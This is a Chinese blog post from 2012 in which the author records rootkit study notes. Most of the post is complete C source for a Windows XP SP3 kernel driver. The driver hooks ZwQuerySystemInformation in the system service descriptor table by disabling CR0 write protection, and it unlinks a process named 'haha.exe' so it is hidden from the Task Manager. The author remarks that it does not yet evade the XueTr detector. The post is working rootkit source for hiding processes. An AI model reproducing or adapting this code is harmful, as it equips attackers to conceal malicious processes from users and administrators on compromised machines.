标 题: Rootkit进程篇之进程隐藏 QuerySystemInformation
作 者: Y4ng
时 间: 2012-07-11 18:30:26 星期三
链 接: http://www.cnblogs.com/Y4ng/archive/2012/07/11/2586812.html
rootkit 系列课程在断断续续的学习着,到今天也算一个小阶段因为驱动算是入门了;之前看张帆老师的《Windows驱动开发技术详解》感觉讲的太基础了,不太适合我这种急性子的人学,草草看完 事后和没看一样。。。
个人觉得毛德操的《windows内核情景分析》搭配网络上高手的文章来学比较适合我这种不按正规路线走的人;
下面是我学习rootkit系列之进程篇的一个小章节, 记录下来 一来可以备忘,二来可以帮助后来的初学者;
以下代码适用于:windows xp sp3
#include <ntddk.h> ///////////////////定义本地结构体////////////////////////////////////////// struct _SYSTEM_THREADS { LARGE_INTEGER KernelTime; LARGE_INTEGER UserTime; LARGE_INTEGER CreateTime; ULONG WaitTime; PVOID StartAddress; CLIENT_ID ClientIs; KPRIORITY Priority; KPRIORITY BasePriority; ULONG ContextSwitchCount; ULONG ThreadState; KWAIT_REASON WaitReason; }; typedef struct _SYSTEM_PROCESSES { ULONG NextEntryDelta; ULONG ThreadCount; ULONG Reserved[6]; LARGE_INTEGER CreateTime; LARGE_INTEGER UserTime; LARGE_INTEGER KernelTime; UNICODE_STRING ProcessName; KPRIORITY BasePriority; ULONG ProcessId; ULONG InheritedFromProcessId; ULONG HandleCount; ULONG Reserved2[2]; VM_COUNTERS VmCounters; IO_COUNTERS IoCounters; struct _SYSTEM_THREADS Threads[1]; }*PSYSTEM_PROCESS, SYSTEM_PROCESS; typedef NTSTATUS (*ZWQUERYSYSTEMINFORMATION)( IN ULONG SystemInformationClass, IN PVOID SystemInformation, IN ULONG SystemInformationLength, OUT PULONG ReturnLength); /////////////////定义ntoskrnl.exe的服务表结构//////////////////////////////////////////////// typedef struct _ServiceDescriptorEntry { unsigned int *ServiceTableBase; unsigned int *ServiceCounterTableBase; unsigned int NumberOfServices; unsigned char *ParamTableBase; }ServiceDescriptorTableEntry, *PServiceDescriptorTableEntry; typedef struct _KESSDT { PVOID ServiceTableBase; PVOID ServiceCounterTableBase; unsigned int NumberOfService; PVOID ParamTableBase; }ServiceDescriptorEntry, *PServiceDescriptorEntry; __declspec (dllimport)ServiceDescriptorEntry KeServiceDescriptorTable; #define QUERYSYSTEMINFORMATIONID 0xAD #define SystemProcessAndThreadsInformation 5 // 变量定义 ZWQUERYSYSTEMINFORMATION OldQuerySystemInformation; NTSTATUS MyZwQuerySystemInformation(IN ULONG SystemInformationClass, IN OUT PVOID SystemInformation, IN ULONG SystemInformationLength, OUT PULONG ReturnLength) { PSYSTEM_PROCESS systemprocess; PSYSTEM_PROCESS prev; NTSTATUS status; UNICODE_STRING uprocessname; if (NULL == OldQuerySystemInformation) { return STATUS_UNSUCCESSFUL; } status = OldQuerySystemInformation(SystemInformationClass, SystemInformation, SystemInformationLength, ReturnLength); if (!NT_SUCCESS(status)) { return status; } if (SystemProcessAndThreadsInformation != SystemInformationClass) { return status; } RtlInitUnicodeString(&uprocessname, L"haha.exe"); systemprocess = (PSYSTEM_PROCESS)SystemInformation; prev = systemprocess; while(systemprocess->NextEntryDelta) { if (RtlEqualUnicodeString(&systemprocess->ProcessName, &uprocessname, TRUE)) { //prev->NextEntryDelta = systemprocess + systemprocess->NextEntryDelta; prev->NextEntryDelta = prev->NextEntryDelta + systemprocess->NextEntryDelta; DbgPrint("Hide haha.exe Successful!\n"); break; } prev = systemprocess; systemprocess = (PSYSTEM_PROCESS)((char*)systemprocess + systemprocess->NextEntryDelta); } return status; } NTSTATUS Unload(PDRIVER_OBJECT DriverObject) { ULONG address = (ULONG)((char*)KeServiceDescriptorTable.ServiceTableBase + QUERYSYSTEMINFORMATIONID * 4); __asm { cli mov eax, cr0 and eax, not 0x10000 mov cr0, eax } *((ULONG*)address) = (ULONG)OldQuerySystemInformation; __asm { mov eax, cr0 or eax, 0x10000 mov cr0, eax sti } return STATUS_SUCCESS; } NTSTATUS DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath) { ULONG address = (ULONG)((char*)KeServiceDescriptorTable.ServiceTableBase + QUERYSYSTEMINFORMATIONID * 4); OldQuerySystemInformation = (ZWQUERYSYSTEMINFORMATION)*((ULONG*)address); __asm { cli mov eax, cr0 and eax, not 0x10000 mov cr0, eax } *((ULONG*)address) = (ULONG*)MyZwQuerySystemInformation; __asm { mov eax, cr0 or eax, 0x10000 mov cr0, eax sti } DriverObject->DriverUnload = Unload; return STATUS_SUCCESS; }
在windows自带的进程管理里面确实是隐藏了,但还是无法过 xuetr ,需要再接再厉!
代码参考连接并致谢以下同学:
http://hi.baidu.com/zzed1008/blog/item/a7827fef8561d4e8cf1b3e27.html